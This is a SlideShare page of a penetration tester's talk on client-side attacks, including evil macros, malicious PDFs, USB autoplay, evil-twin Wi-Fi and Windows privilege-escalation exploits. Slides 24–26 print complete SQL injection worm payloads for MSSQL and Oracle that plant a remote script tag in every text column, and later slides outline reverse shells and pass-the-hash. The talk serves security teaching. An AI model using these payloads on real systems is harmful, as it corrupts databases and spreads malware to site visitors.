Tactical Assassins

557 views

Published on

Client Side Exploitation Techniques for attack client-side then access into intranet for fun, Additional latest Microsoft vulnerability that never patch for year (MS was Suck...)

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
557
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
49
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Tactical Assassins

  1. 1. Tactical Assassins : Client-Side OWNage Prathan Phongthiproek ACIS Professional Center Senior Information Security Consultant
  2. 2. Who am I ?!   Instructor / Speaker   Red Team : Penetration Tester (Team Leader)   Security Consultant / Researcher   CWH Underground   Exploits and Vulnerabilities Disclosure   Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
  3. 3. Let’s Talk!   Attack Layer 8: Client-Side OWNage   MS Office (Evil Macro)   Malicious Adobe PDF   Malicious USB   One-Click Attack   Evil-Twin Attack!   Built-in Pen-Test Tactics   Black Hat versus White Hat   Using Black Hat styles to Compromise system   Operation CloudBurst
  4. 4. Client-Side OWNage The Way to Attack Layer 8!
  5. 5. MS Office (Evil Macro)!   MS Office is Evil !!
  6. 6. MS Office (Evil Macro)!
  7. 7. MS Office (Evil Macro)!
  8. 8. MS Office (Evil Macro)!
  9. 9. Malicious Adobe PDF!
  10. 10. Malicious Adobe PDF!
  11. 11. Malicious Adobe PDF!
  12. 12. Malicious Adobe PDF!
  13. 13. Malicious Adobe PDF! Malicious PDF File
  14. 14. Malicious Adobe PDF!
  15. 15. Malicious Adobe PDF!
  16. 16. Malicious USB!   Autoplay NOT Autorun
  17. 17. Malicious USB!   Turn Off Autoplay -> It’s still vulnerable from evil usb
  18. 18. Malicious USB!
  19. 19. Malicious USB!
  20. 20. Malicious USB! 0xff HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
  21. 21. Malicious USB!
  22. 22. One-Click Attack!
  23. 23. One-Click Attack!
  24. 24. One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004100520045002000400054002000760061 0072006300680061007200280032003500350029002C004000430 02000760061007200630068006100720028003200350035002900 20004400450043004C0041005200450020005400610062006C00 65005F0043007500720073006F007200200043005500520053004 F005200200046004F0052002000730065006C006500630074002 00061002E006E0061006D0065002C0062002E006E0061006D00 65002000660072006F006D0020007300790073006F0062006A00 6500630074007300200061002C0073007900730063006F006C00 75006D006E007300200062002000770068006500720065002000 61002E00690064003D0062002E0069006400200061006E006400 200061002E00780074007900700065003D002700750027002000 61006E0064002000280062002E00780074007900700065003D00 3900390020006F007200200062002E00780074007900700065003 D003300350020006F007200200062002E0078007400790070006 5003D0032003300310020006F007200200062002E00780074007 900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
  25. 25. One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C LAR E T a b l e _ C u r s o r C U R S O R F O R select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtyp e='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table _Cursor FETCH NEXT FROM Table_Curs o r I NTO @T, @ C W H I LE ( @ @ F ETC H _ STATU S=0) BEGIN exec('update ['+@T+'] set [' +@C+']=rtrim(convert(varchar,['+@C+'])) +''<script src=http://www.fengnima.cn/k.j s></script>''')FETCH NEXT FROM Table_ Cursor INTO @T,@C END CLOSE Table_C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS %20NVARCHAR(4000));EXEC(@S);--
  26. 26. One-Click Attack!   SQL Injection Worms - Oracle!   http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)|| chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)|| chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)|| chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)|| chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)|| chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)|| chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr (101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)|| chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr (82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr (72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
  27. 27. One-Click Attack!
  28. 28. One-Click Attack!
  29. 29. One-Click Attack!
  30. 30. One-Click Attack!
  31. 31. One-Click Attack! Link to Malicious Website Reverse Shell to Attackers
  32. 32. One-Click Attack!
  33. 33. Evil-Twin Attack!   Karma + Metasploit = Karmetasploit !!   Rouge Access Point (Evil Twin): Steal usernames, passwords and information from public wireless hotspots   Why we don’t steal something evil like credit card (Pay to Play) ??
  34. 34. Evil-Twin Attack!
  35. 35. Evil-Twin Attack!
  36. 36. Evil-Twin Attack!
  37. 37. Built-in Pen-Test Tactics!
  38. 38. Black Hat versus White Hat!   Thinking Outside of the Box   Thinking Inside the box   Know one piece of information   Assigned Limited block of IP and have to expand from there address   Compromise all system and   Unable to go beyond the scope Target Attack of approved list, Only touch xyz hosts, Don’t touch abc host.   All Methodologies was Integrate   Follow Pen-Test Methodologies; OSSTMM, NIST, ISSAF   Download Exploit from Milw0rm,   Manual Foot printing, No noisy Exploit with Core Impact, scan, Just Nmap and 0-Day CANVAS, Metasploit Attack   Oops, I cannot hack user.   Attack Layer 8 :Client-Side OWNage
  39. 39. Using Black Hat styles to Compromise system   Pen-Tester Must “Thinking outside of the box”   Attack Layer 8 : More effective result   Pen-Test with Black Hat styles   Using Black Hat Mind   Email Address Enumeration   Social Networking (Maltego)   Social Engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc)   Information Gathering All subdomain   xyz.victim.com, abc.victim.com, 123.victim.com   Blind Test, Compromise all system and Target Attack
  40. 40. Using Black Hat styles to Compromise system
  41. 41. Operation CloudBurst!
  42. 42. KiTra0d – Local Ring0 Kernel Exploit   MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)   Patch release MS10-015 on Feb 09 2010 Get The Hell Outta Here !!   0-day for 1 month. W00t ! W00t !
  43. 43. KiTra0d – Local Ring0 Kernel Exploit
  44. 44. Token Kidnapping – Elevate Privilege   Token - Web Cookies   On Windows XP / 2003 – Windows Service run as SYSTEM account   Compromise of a Service == Full System Compromise   On Windows Vista / 2008 - LocalService / NetworkService == System   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Patch release MS09-012 on April 14 2009   0-day for 1 year. W00t ! W00t !!   Black hat Mind !!   Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
  45. 45. Operation CloudBurst   Start Mission with Attack Layer 8   SPAM Mail / 1-Click Ownage   Reverse Shell to Attacker   KiTrap0D – The Message From Slave to God   0-Day Ring0 xpl, All Windows OS   Maintain Access   Pivot (Tunneling), Backdoor Position   Compromise All System and Domain Controller   Impersonate Token, Pass-The-Hash Attack
  46. 46. Operation CloudBurst! Intranet Reverse Shell connection to Attacker Internet Attack Network – Passthehash, KiTrap0d XPL impersonate Token Pivot Network – Route Add
  47. 47. If someone is still in the room.. Q&A! THANK YOU!

×